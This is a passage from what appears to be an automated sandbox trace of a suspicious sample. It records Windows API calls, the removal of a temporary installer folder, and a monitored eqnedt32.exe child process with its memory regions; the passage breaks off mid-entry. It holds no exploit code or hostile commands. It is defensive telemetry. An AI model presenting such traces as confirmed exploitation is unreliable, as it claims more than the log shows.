dwMilliseconds=0x64) returned 0x102 [0189.933] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0189.933] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0194.627] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0194.627] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0195.251] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0195.252] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0195.652] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0195.652] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0196.141] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0196.141] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0196.645] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0196.645] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0197.413] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0197.414] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0197.555] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0197.556] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0201.046] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0201.046] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0201.596] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0201.596] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0201.908] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0201.908] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0203.119] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0203.119] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0204.051] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0204.051] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0204.338] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0204.339] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0204.805] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0204.805] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0205.022] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0205.022] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0205.125] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0205.125] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0206.511] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0206.512] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0206.851] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0206.851] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0207.520] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0207.520] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0208.434] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0208.434] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0210.040] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0210.040] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0211.284] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0211.284] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0215.874] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0215.874] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0217.071] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0217.071] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0220.304] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0220.304] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0222.500] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0222.501] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0222.865] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0222.865] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0226.900] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0226.900] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0228.651] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0228.652] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0228.896] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0228.896] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0229.219] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0229.220] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0229.500] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0229.500] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0229.782] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0229.782] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0230.130] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0230.130] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0230.447] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0230.447] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0230.878] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0230.878] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x0 [0230.878] GetExitCodeProcess (in: hProcess=0x20c, lpExitCode=0x19f93c | out: lpExitCode=0x19f93c*=0x0) returned 1 [0230.879] CloseHandle (hObject=0x20c) returned 1 [0230.879] EndDialog (hDlg=0x30460, nResult=0x0) returned 1 [0230.899] CloseHandle (hObject=0x1c8) returned 1 [0230.900] CloseHandle (hObject=0x1d4) returned 1 [0231.165] lstrcpynA (in: lpString1=0x4218a0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp" [0231.166] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp") returned 48 [0231.166] FindFirstFileA (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp", lpFindFileData=0x4224e8 | out: lpFindFileData=0x4224e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a9b08c7, ftCreationTime.dwHighDateTime=0x1d81e4a, ftLastAccessTime.dwLowDateTime=0x2a9b08c7, ftLastAccessTime.dwHighDateTime=0x1d81e4a, ftLastWriteTime.dwLowDateTime=0x2a9b08c7, ftLastWriteTime.dwHighDateTime=0x1d81e4a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x10, cFileName="nsr4335.tmp", cAlternateFileName="")) returned 0x456d40 [0231.167] FindClose (in: hFindFile=0x456d40 | out: hFindFile=0x456d40) returned 1 [0231.167] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp") returned 48 [0231.167] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0231.167] FindFirstFileA (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpFindFileData=0x4224e8 | out: lpFindFileData=0x4224e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4b31e6fe, ftLastAccessTime.dwHighDateTime=0x1d81e4a, ftLastWriteTime.dwLowDateTime=0x4b31e6fe, ftLastWriteTime.dwHighDateTime=0x1d81e4a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x10, cFileName="Temp", cAlternateFileName="")) returned 0x456f00 [0231.168] FindClose (in: hFindFile=0x456f00 | out: hFindFile=0x456f00) returned 1 [0231.168] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0231.168] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local") returned 31 [0231.168] FindFirstFileA (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local", lpFindFileData=0x4224e8 | out: lpFindFileData=0x4224e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x388692d, ftLastAccessTime.dwHighDateTime=0x1d81e4a, ftLastWriteTime.dwLowDateTime=0x388692d, ftLastWriteTime.dwHighDateTime=0x1d81e4a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x10, cFileName="Local", cAlternateFileName="")) returned 0x456f00 [0231.168] FindClose (in: hFindFile=0x456f00 | out: hFindFile=0x456f00) returned 1 [0231.168] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local") returned 31 [0231.169] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData") returned 25 [0231.169] FindFirstFileA (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData", lpFindFileData=0x4224e8 | out: lpFindFileData=0x4224e8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x10, cFileName="AppData", cAlternateFileName="")) returned 0x456e00 [0231.169] FindClose (in: hFindFile=0x456e00 | out: hFindFile=0x456e00) returned 1 [0231.169] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData") returned 25 [0231.170] lstrlenA (lpString="C:\\Users\\RDHJ0C~1") returned 17 [0231.170] FindFirstFileA (in: lpFileName="C:\\Users\\RDHJ0C~1", lpFindFileData=0x4224e8 | out: lpFindFileData=0x4224e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x10, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x4569c0 [0231.170] FindClose (in: hFindFile=0x4569c0 | out: hFindFile=0x4569c0) returned 1 [0231.170] lstrlenA (lpString="C:\\Users\\RDHJ0C~1") returned 17 [0231.171] lstrlenA (lpString="C:\\Users") returned 8 [0231.171] FindFirstFileA (in: lpFileName="C:\\Users", lpFindFileData=0x4224e8 | out: lpFindFileData=0x4224e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x10, cFileName="Users", cAlternateFileName="")) returned 0x456d00 [0231.171] FindClose (in: hFindFile=0x456d00 | out: hFindFile=0x456d00) returned 1 [0231.171] lstrlenA (lpString="C:\\Users") returned 8 [0231.171] lstrlenA (lpString="C:") returned 2 [0231.171] lstrlenA (lpString="C:") returned 2 [0231.172] lstrcatA (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0231.172] GetFileAttributesA (lpFileName="C:\\" (normalized: "c:")) returned 0x16 [0231.172] lstrcpynA (in: lpString1=0x4214a0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp" [0231.172] lstrcatA (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp\\*.*") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp\\*.*" [0231.172] lstrcatA (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp\\" [0231.172] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp\\") returned 49 [0231.172] FindFirstFileA (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp\\*.*", lpFindFileData=0x19fc94 | out: lpFindFileData=0x19fc94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a9b08c7, ftCreationTime.dwHighDateTime=0x1d81e4a, ftLastAccessTime.dwLowDateTime=0x2a9b08c7, ftLastAccessTime.dwHighDateTime=0x1d81e4a, ftLastWriteTime.dwLowDateTime=0x2a9b08c7, ftLastWriteTime.dwHighDateTime=0x1d81e4a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x456bc0 [0231.173] FindNextFileA (in: hFindFile=0x456bc0, lpFindFileData=0x19fc94 | out: lpFindFileData=0x19fc94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a9b08c7, ftCreationTime.dwHighDateTime=0x1d81e4a, ftLastAccessTime.dwLowDateTime=0x2a9b08c7, ftLastAccessTime.dwHighDateTime=0x1d81e4a, ftLastWriteTime.dwLowDateTime=0x2a9b08c7, ftLastWriteTime.dwHighDateTime=0x1d81e4a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0231.174] FindNextFileA (in: hFindFile=0x456bc0, lpFindFileData=0x19fc94 | out: lpFindFileData=0x19fc94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a9b08c7, ftCreationTime.dwHighDateTime=0x1d81e4a, ftLastAccessTime.dwLowDateTime=0x2a9b08c7, ftLastAccessTime.dwHighDateTime=0x1d81e4a, ftLastWriteTime.dwLowDateTime=0x2a9b08c7, ftLastWriteTime.dwHighDateTime=0x1d81e4a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0231.174] FindClose (in: hFindFile=0x456bc0 | out: hFindFile=0x456bc0) returned 1 [0231.174] FindFirstFileA (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp", lpFindFileData=0x4224e8 | out: lpFindFileData=0x4224e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a9b08c7, ftCreationTime.dwHighDateTime=0x1d81e4a, ftLastAccessTime.dwLowDateTime=0x2a9b08c7, ftLastAccessTime.dwHighDateTime=0x1d81e4a, ftLastWriteTime.dwLowDateTime=0x2a9b08c7, ftLastWriteTime.dwHighDateTime=0x1d81e4a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nsr4335.tmp", cAlternateFileName="")) returned 0x457000 [0231.174] FindClose (in: hFindFile=0x457000 | out: hFindFile=0x457000) returned 1 [0231.174] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp") returned 48 [0231.174] lstrcatA (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp\\" [0231.175] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsr4335.tmp")) returned 0x10 [0231.175] SetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp\\", dwFileAttributes=0x10) returned 1 [0231.175] RemoveDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsr4335.tmp")) returned 1 [0231.176] OleUninitialize () [0231.183] ExitProcess (uExitCode=0x0) Thread: id = 47 os_tid = 0x109c Thread: id = 49 os_tid = 0x10b4 Thread: id = 50 os_tid = 0x1180 Process: id = "5" image_name = "eqnedt32.exe" filename = "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\equation\\eqnedt32.exe" page_root = "0x1b824000" os_pid = "0x10a4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x13d0" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\EQUATION\\eqnedt32.exe\" -Embedding" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1133 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1134 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1135 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1136 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1137 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1138 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1139 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1140 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1141 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1142 start_va = 0x400000 end_va = 0x48dfff monitored = 0 entry_point = 0x44cd40 region_type = mapped_file name = "eqnedt32.exe" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\EQUATION\\eqnedt32.exe" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\equation\\eqnedt32.exe") Region: id = 1143 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1144 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1145 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1146 start_va = 0x7fff0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1147 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1148 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 1182 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1183 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 1184 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1185 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1186 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1187 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1188 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1189 start_va = 0x5d0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 1190 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1191 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1192 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1193 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1194 start_va = 0x4a0000 end_va = 0x55dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1195 start_va = 0x6cc50000 end_va = 0x6ce04fff monitored = 0 entry_point = 0x6cd43d5a region_type = mapped_file name = 